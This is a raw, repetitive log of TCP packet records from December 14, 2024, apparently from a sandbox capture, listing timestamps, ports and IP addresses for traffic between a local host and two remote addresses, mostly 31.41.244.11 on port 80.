Dec 14, 2024 23:58:20.689810038 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.689863920 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.689905882 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.690859079 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.690903902 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.690967083 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.691008091 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.691983938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.692028046 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.692075968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.692116976 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.693092108 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.693145037 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.693181992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.693223953 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.694171906 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.694269896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.694317102 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.695286989 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.695492029 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.695535898 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.696409941 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.696455956 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.696552038 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.697406054 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.697448015 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.697489977 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.697561026 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.697602987 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.698623896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.698666096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.698683023 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.698723078 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.699651003 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.699695110 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.699755907 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.699805021 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.700751066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.700797081 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.700890064 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.700932026 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.701833963 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.701978922 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.702028036 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.826255083 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:20.826349020 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:20.826453924 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:20.837017059 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.837219000 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.837285995 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.837543964 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.837688923 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.837737083 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.838696003 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.838845968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.838891029 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.839772940 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.839822054 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.839899063 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.840857983 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.840903997 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.840955973 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.841398001 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.841960907 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.842076063 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.842118979 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.843019009 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.843156099 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.843200922 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.844109058 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.844155073 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.844285965 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.845225096 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.845271111 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.845367908 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.846339941 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.846393108 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.846426010 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.846470118 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.847419977 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.847541094 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.847589970 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.848526955 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.848651886 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.848706961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.849600077 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.849728107 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.849778891 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.850704908 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.850759983 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.850841045 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.851807117 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.851856947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.851926088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.852904081 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.852953911 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.853037119 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.853081942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.853998899 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.854129076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.854186058 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.855102062 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.855216980 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.855264902 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.856220961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.856324911 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.856374025 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.857311010 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.857357025 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.857413054 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.858398914 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.858445883 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.858520985 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.859534979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.859585047 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.859620094 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.859675884 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.860580921 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.860685110 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.860738039 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.861687899 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.861824036 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.861886978 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.862809896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.862935066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.862994909 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.863878012 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.864021063 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.864073038 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.864970922 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.865103006 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.865164995 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.866071939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.866125107 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.866174936 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.867177963 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.867239952 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.867288113 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.867427111 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.868261099 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.868508101 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.868562937 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.869354963 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.869498014 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.869559050 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.870507002 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.870557070 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.870635033 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.871613026 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.871686935 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.871733904 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.872667074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.872719049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.872751951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.872800112 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.873780966 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.873843908 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.873889923 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.874151945 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.874844074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.874980927 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.875030041 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.875952959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.876008034 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.876072884 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.876116991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.877029896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.877159119 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.877207041 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.878170967 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.878299952 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.878353119 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.879260063 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.879328012 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.879426956 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.880390882 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.880434036 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.880450010 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.881397963 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.881433010 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.881566048 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.881612062 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.882543087 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.882654905 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.882703066 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.883636951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.883680105 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.883790970 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.884834051 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.884879112 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.885010958 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.885399103 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.885829926 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.885961056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.886006117 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.886931896 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.887058020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.887110949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.888016939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.888082027 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.888216972 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.889121056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.889194965 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.889241934 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.889400005 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.890244961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.890379906 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.890439034 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.891299009 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.891433954 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.891491890 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.892400980 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.892442942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.892582893 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.893444061 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.893515110 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.893557072 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.893666983 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.893711090 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.894532919 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:20.894577980 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:20.906842947 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:20.906842947 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:20.906908989 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:20.907057047 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:21.029354095 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.029411077 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.029463053 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.029536009 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.029895067 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.029943943 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.030039072 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.030097961 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.030957937 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.031104088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.031151056 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.032087088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.032202959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.032284975 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.033158064 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.033210039 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.033301115 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.033435106 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.034252882 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.034305096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.034384012 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.034435987 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.035353899 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.035406113 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.035450935 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.035495996 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.036428928 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.036482096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.036556959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.036629915 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.037522078 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.037570953 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.037657022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.038047075 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.038640022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.038686991 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.038779974 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.038825989 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.039736986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.039786100 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.039832115 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.039880037 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.040818930 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.040869951 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.040970087 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.041013956 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.041933060 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.041980982 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.042051077 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.042104006 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.043067932 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.043117046 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.043191910 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.043236017 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.044125080 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.044173002 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.044239998 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.044289112 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.045207024 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.045255899 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.045337915 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.045402050 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.046314955 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.046365023 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.046438932 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.046502113 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.047413111 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.047466040 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.047549009 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.047667027 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.048536062 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.048587084 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.048654079 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.048702002 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.049612999 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.049664974 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.049746037 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.049803972 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.050731897 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.050784111 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.050848961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.050910950 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.051827908 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.051881075 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.051923990 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.051976919 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.052908897 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.052961111 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.053026915 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.053091049 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.053993940 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.054048061 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.054127932 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.054189920 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.055093050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.055147886 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.055227041 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.055289030 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.056195021 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.056247950 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.056313992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.056365967 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.057305098 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.057363987 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.057427883 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.057490110 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.058415890 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.058469057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.058535099 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.058598042 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.059494019 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.059545994 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.059627056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:21.059695005 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:21.060601950 CET	80	49793	31.41.244.11	192.168.2.4
